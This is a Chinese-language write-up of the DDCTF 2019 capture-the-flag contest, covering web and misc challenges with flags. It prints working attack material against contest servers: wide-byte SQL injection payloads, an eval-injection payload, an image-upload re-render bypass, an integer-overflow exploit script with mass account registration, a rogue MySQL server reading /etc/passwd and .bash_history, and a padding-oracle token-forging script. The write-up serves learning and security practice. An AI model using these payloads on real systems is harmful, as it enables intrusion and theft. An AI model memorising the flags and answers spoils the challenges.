DDCTF-2019-writeup(7web+5misc)
一年前第一次参加了DDCTF,再次参加简单记录下web与misc的writeup
Web
Web1 滴~
1、jpg参数可以包含文件,参数经过两次base64和一次16进制编码,将index.php编码后,get提交
即可得到index.php源码。源码中关键有三处,1.csdn博客,2.[a-zA-Z0-9.],3.config替换为!。
2、查看博客,在该博客下另一篇博客中获取到一个关键文件名,practice.txt.swp,一般情况应为.practice.txt.swp,这里应作为特殊情况。
3、从中获取到关键文件名flag!ddctf.php。因为jpg只允许输入字母数字点,所以无法直接获取源码,这里使用config来绕过,即flagconfigddctf.php即可获取文件内容。
4、文件内容存在变量覆盖漏洞,构造payload覆盖即可
http://117.51.150.246/f1ag!ddctf.php?k=practice.txt.swp&uid=f1ag!ddctf.php
Web2 WEB 签到题
1、访问页面,F12-Network-发现一个auth.php,存在一个可伪造的ddctf_username,将其伪造为admin,获取到http://117.51.158.44/app/fL2XID2i0Cdh.php,获取到两个文件的源码
2、将源码内容全部一遍,并且分析后,得知需要构造ddctf_id通过反序列化来读取flag,需要注意的几个点,
a) ddctf_id要验证md5,且存在盐config/key.txt
b) Path长度为18,会将../替换为空
3、关于a,当输入一个nickname时,会输出Welcome my friend $nickname,但因使用sprintf函数,存在格式化字符串操作,所以输入%s会输出config/key.txt,注意修改content-type。之后可以使用这个key伪造ddctf_id,格式为key+ser+md5(key+ser),并且Session.php包含了appication.php所以可以直接伪造application
4、关于b,../可以使用双写绕过,不足18字符部分,使用.和/补充。这里我的payload为
Web3 Upload-IMG
上传图片,将返回的图片下载,发现经过了二次渲染。在github搜索imagecreatefromjpeg后,找到个poc
https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromjpeg
知道该版本渲染存在绕过方式,只需在ffda….3f00后更改为想要的字符将不会被二次渲染,除此之外程序永远返回jpg。所以构造即可。
但是这里来到了坑点,并不是所有图片不会改变,在windows的phpstudy和linux下,多次尝试后发现,只需将一张渲染后的图片拿来更改成功率会大大提高,所以整个流程为。上传一张jpg,下载,更改下载的这张jpg,上传,获取flag。有一定成功率,多尝试即可。
Web4 homebrew event loop
审计源码后,知道输入的请求会被多段解析,最后在eval处执行方法,并且带一个list参数args。因为使用eval来执行参数,所以只需在url中使用%23(#)后即可注释后续字符,绕过handler限制,但因为存在一个list参数,所以无法直接执行FLAG,继续审计,得知trigger_event函数为一个队列,且执行buy_handler会把consume_point_function放入队列。
buy_handler的参数可以大于3,但因consume_point_function会验证回滚,所以我们就是要解决这个问题。经过审计,发现可以构造任意方法队列,所以我们直接构造这样的payload,action:trigger_event%23;action:buy;5%23action:get_flag;,即可将flag写入session。最后使用ph师傅的flask session解密脚本,解出flag
Web5 欢迎报名DDCTF
根据提示尝试xss,发现第一行,第二行,有字符输入限制。只需将xss,payload写在第三行即可xss成功,因之前扫描发现login.php,admin.php,且提示说不是xss cookie,所以这里尝试获取源码,在admin.php中获取到一个query_aIeMu0FUoVrW0NWPHbN6z4xh.php,根据提示,输入id,没有回显。尝试或其其他页面,获取到一个hint.php,得到查询字段。依然没有进展。最后在返回数据包中发现gbk,且提示为注入,尝试宽字节注入,%df%27…%23,经过常规手工注入后获取到flag
1 ?id=1%df\' union select 1,2,3,table_schema,table_name from information_schema.tables%23 2 ?id=1%df\' union select 1,2,3,4,column_name from information_schema.columns%23 3 ?id=1%df\' union select 1,2,ctf_value,4,5 from ctfdb.ctf_fhmHRPL5%23
Web6 大吉大利,今晚吃鸡~
第一关整数溢出,将票价定为2**32即可在付款时0元购票。
第二关需要新建多个小号,完成100次不同编号的击杀,只能使用脚本。这里给出脚本。
1 import requests 2 import time 3 4 for i in range(0,500): 5 s=requests.session() 6 r=\'\' 7 username=\'wons\'+str(i) 8 while \'-\' not in r: 9 url=\'http://117.51.147.155:5050/ctf/api/register?name={username}&password=wonswons\'.format(username=username) 10 s.get(url) 11 url=\'http://117.51.147.155:5050/ctf/api/login?name={username}&password=wonswons\'.format(username=username) 12 s.get(url) 13 url=\'http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296\' 14 s.get(url) 15 url="http://117.51.147.155:5050/ctf/api/get_user_balance" 16 r=s.get(url).content[46:82] 17 print 1,r 18 time.sleep(0.8) 19 id=\'\' 20 ticket=\'\' 21 while id ==\'\' or ticket==\'\': 22 url="http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id="+r 23 s.get(url) 24 url="http://117.51.147.155:5050/ctf/api/search_ticket" 25 try: 26 t=eval(s.get(url).content) 27 id=t[\'data\'][0][\'id\'] 28 ticket=t[\'data\'][0][\'ticket\'] 29 except: 30 pass 31 print 2,t 32 time.sleep(0.5) 33 v=\'\' 34 if id==31: 35 continue 36 while \'\u79fb\u9664\u4e00\u4e2a\u673a\u5668\u4eba\u73a9\u5bb6\' not in v: 37 s=requests.session() 38 url=\'http://117.51.147.155:5050/ctf/api/login?name=wons&password=wonswons\' 39 s.get(url) 40 url=\'http://117.51.147.155:5050/ctf/api/remove_robot?id={id}&ticket={ticket}\'.format(id=id,ticket=ticket) 41 v=s.get(url).text 42 time.sleep(0.5) 43 print 3,v
Web7 mysql弱口令
将agent.py部署后,服务器建立mysql且为弱口令,多次tcpdump抓取数据,并且根据提示。大概明白是要完成一个类似于中间人攻击的操作,在github找到Rogue-MySql-Server,并且将agent.py返回的Rogue-MySql-Server的py进程,伪造为mysqld。达到任意文件读。尝试读取/etc/passwd,发现dc2-user,尝试读取其.bash_history,读取到后无果,尝试读取root的.bash_history,发现了关键内容vim /home/dc2-user/ctf_web_2/app/main/views.py,读取view.py后,发现flag在数据库中,经过多次尝试在/var/lib/mysql/security/flag.ibd中找到flag
Web8 再来1杯Java(并未解出)
Padding Oracel,这里附上脚本
1 #coding=utf-8 2 import requests 3 s=\'UGFkT3JhY2xlOml2L2NiY8O+7uQmXKFqNVUuI9c7VBe42FqRvernmQhsxyPnvxaF\'.decode(\'base64\') 4 5 #####获取后半段的middle 6 \'\'\' 7 middle=[] 8 for i in range(1,17): 9 iv=\'\' 10 for j in middle[::-1]: 11 iv+=chr(i^j) 12 for j in range(256): 13 token=s[:16]+\'\x00\'*(16-i)+chr(j)+iv+s[32:] 14 token=token.encode(\'base64\')[:-1] 15 cookies= {\'token\': token} 16 r=requests.get(\'http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/gen_token\',cookies=cookies).text 17 if \'parse\' in r: 18 middle.append(j^i) 19 print token 20 break 21 print middle 22 \'\'\' 23 ####伪造后半段的iv 24 \'\'\' 25 middle=[19, 80, 63, 211, 94, 75, 38, 89, 11, 199, 102, 4, 138, 135, 211, 167][::-1] 26 text=\'dmin":true}\x05\x05\x05\x05\x05\' 27 new_iv=\'\' 28 for i in range(len(text)): 29 new_iv+=chr(ord(text[i])^middle[i]) 30 token=s[:16]+new_iv+s[32:] 31 token=token.encode(\'base64\')[:-1] 32 print token 33 \'\'\' 34 ###UGFkT3JhY2xlOml2L2NiY8O+7uQmXLN5LEM2W9Y6VRa42FqRvernmQhsxyPnvxaF 35 s=\'UGFkT3JhY2xlOml2L2NiY8O+7uQmXLN5LEM2W9Y6VRa42FqRvernmQhsxyPnvxaF\'.decode(\'base64\') 36 37 #####获取前半段的middle 38 \'\'\' 39 middle=[] 40 for i in range(1,17): 41 iv=\'\' 42 for j in middle[::-1]: 43 iv+=chr(i^j) 44 for j in range(256): 45 token=\'\x00\'*(16-i)+chr(j)+iv+s[16:32] 46 token=token.encode(\'base64\')[:-1] 47 cookies= {\'token\': token} 48 r=requests.get(\'http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/gen_token\',cookies=cookies).text 49 if \'parse\' in r: 50 middle.append(j^i) 51 print token 52 break 53 print middle\'\'\' 54 55 middle=[155, 97, 132, 252, 102, 28, 20, 19, 14, 193, 24, 113, 210, 113, 223, 16][::-1] 56 ####伪造前半段的iv 57 text=\'{"id":100,"roleA\' 58 new_iv=\'\' 59 for i in range(len(text)): 60 new_iv+=chr(ord(text[i])^middle[i]) 61 token=new_iv+s[16:] 62 token=token.encode(\'base64\')[:-1] 63 print token 64 #a/0YtlMi8D4jOD4Uk+gE2sO+7uQmXLN5LEM2W9Y6VRa42FqRvernmQhsxyPnvxaF
后续存在任意文件读,没有思路
Misc
Misc1 真签到题
公告栏里获取
Misc2 北京地铁
Lsb隐写得到aes密文,地图上魏公村颜色不一样,拼音即为密钥
1 from Crypto.Cipher import AES 2 3 key=\'weigongcun\' 4 cryptor = AES.new(key+(16-len(key))*\'\x00\', AES.MODE_ECB) 5 text = cryptor.decrypt(\'iKk/Ju3vu4wOnssdIaUSrg==\'.decode(\'base64\')) 6 print text #DDCTF{CD*Q23&0}
Misc3 MulTzor
直接看密文发现每6个16进制可以分为一组,开头都为0-9,猜测是使用3位长的密钥进行加密,最终发现不对。最后使用xortool -c 20 file分析,获取了明文。
Misc5 Wireshark
从两个上传表单中获取到两张图,其中一张通过改高度获取key,然后将另一张放入数据包中出现的地址进行隐写解密,获取flag的十六进制
http://tools.jb51.net/aideddesign/img_add_info
Misc6 联盟决策大会
1 p = 0xC53094FE8C771AFC900555448D31B56CBE83CBBAE28B45971B5D504D859DBC9E00DF6B935178281B64AF7D4E32D331535F08FC6338748C8447E72763A07F8AF7 2 A1 = 0x30A152322E40EEE5933DE433C93827096D9EBF6F4FDADD48A18A8A8EB77B6680FE08B4176D8DCF0B6BF50000B74A8B8D572B253E63473A0916B69878A779946A 3 A2 = 0x1B309C79979CBECC08BD8AE40942AFFD17BBAFCAD3EEBA6B4DD652B5606A5B8B35B2C7959FDE49BA38F7BF3C3AC8CB4BAA6CB5C4EDACB7A9BBCCE774745A2EC7 4 A4 = 0x1E2B6A6AFA758F331F2684BB75CC898FF501C4FCDD91467138C2F55F47EB4ED347334FAD3D80DB725ABF6546BD09720D5D5F3E7BC1A401C8BD7300C253927BBC 5 B3 = 0x300991151BB6A52AEF598F944B4D43E02A45056FA39A71060C69697660B14E69265E35461D9D0BE4D8DC29E77853FB2391361BEB54A97F8D7A9D8C66AEFDF3DA 6 B4 = 0x1AAC52987C69C8A565BF9E426E759EE3455D4773B01C7164952442F13F92621F3EE2F8FE675593AE2FD6022957B0C0584199F02790AAC61D7132F7DB6A8F77B9 7 B5 = 0x9288657962CCD9647AA6B5C05937EE256108DFCD580EFA310D4348242564C9C90FBD1003FF12F6491B2E67CA8F3CC3BC157E5853E29537E8B9A55C0CF927FE45 8 c1=(A1*8-A2*6+A4)/3 9 c2=B3*10-B4*15+B5*6 10 print hex(c1*2-(c2%p))[2:-1].decode(\'hex\') #DDCTF{5x3ROxvqF2SJrDdVy73IADA04PxdLLab}